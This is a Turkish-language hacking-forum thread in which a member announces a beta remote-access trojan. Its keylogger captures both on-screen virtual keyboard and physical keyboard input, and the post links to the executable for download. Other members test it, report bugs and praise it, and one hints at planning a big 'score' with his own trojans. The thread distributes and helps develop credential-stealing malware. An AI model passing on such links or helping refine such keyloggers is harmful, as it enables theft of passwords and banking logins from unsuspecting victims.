Sanal Klavye Log Alici Deneme Versiyon
-
Selamlar.
uzun süredir yeni bir RAT projesi üzerinde calisiorum.
keyloggerında virtual keyboard(sanal klavye) ve gercek klavye log alimini eş zamanli alabiliyor.
bu bir deneme version betasi açık modda.
sisteme kendisini herhangi bir şekilde drop etmez. sadece anlik test için.
bunu XP 2003 vs işletim sistemlerinizde test edip sonuclari yazarsaniz çok iyi olur...
Beta test yapan arkadaslarin nickleri RAT in Hakkında bolumune nickleri yazilacaktir.Test Sürümünü buradan İndirebilirsiniz : http://tr0jan.net/softwares/virtuallogmonitor/project1.exe
İlk Sürümden Görüntü
lütfen gereksiz yere post atmayiniz
Sanal Klavyeyi Çalıştırmayi Bilmeyenler İçin
Başlat / Çalıştır / osk.exe
weya
Winkey + R kısayolu ile acilan calistir penceresine osk.exe yazip entere basinweya
Baslat / calistir / cmd /
gelen komut istemcisine : osk.exe yazip entere basin... -
Harika :) Hiç bir sorun yok
-
bende denedim sorunsuz çalışıyor
-
bi kac koder daha önceden yapmişti ama onlarinki resim çekiyordu 26x21 ebatlarinda.
resim olayi saçma geldi. bende bunu ypayim dedim:D
-
sanırm BIODOX SC yazarı sensin. Projen bende var (kodlarıyla birlikte) güzel iş çıkarmışsın tebrik ederim..
-
biodox yurtta zaman geçirme projesiydi :D
-
turkojana benzetme yerine biraz farklı yapı sergileseydin güzel olurdu ama yine de güzel yapmışsın.Neredeyse bire bir aynı.. Çalışmalarında başarılar dilerim..
edit: bazılarının vb ile trojan yapıl(a)maz sözüne inatla vb ile yazışsın..Bu da başka bir güzellikti..
-
Guiyi değiştirmek zor olmaz. ama VB RAT ne kadar iyi olabilirki...
-
en azından vb ile uğraşmışsın ve neredeyse yapılabilecek herşeyi yapmışsın, bi çok insan bu özelliklerin yarısından daha azı için yığınla para döker.. Benim de trojan çalışmalarım var ama bu sefer iyi bir vurgun yapacağım :)
-
öncelikle tebrik ederim.sanal klavyeden büyük harflerle yazmaya kalkınca sorun çıkarıyor shift e basıp harflere bastığında göstermiyor. (capslock ile oluyormuş)
sadece shift kullanılamıyor. projende başarılar
-
Who tebrikler yine güzel iş çıkarmışsın.
Programda bir sorun var sanırsam
xp 2002 sp3 de test ettim.
İlk çalıştırmamda güzel logladı kapatıp tekrar açtım yine loglarken tuşlara biraz abanim bakim dedim biraz fazla bastım herhalde program titremeye başladı loglar titriyordu yani : ) ayrıca loglama yapmıyordu kapadım açtım tekrar denedim bu sefer normal çalıştı.Benim izlenimlerim böyle Nitrous yazarsın artık " N " büyük :)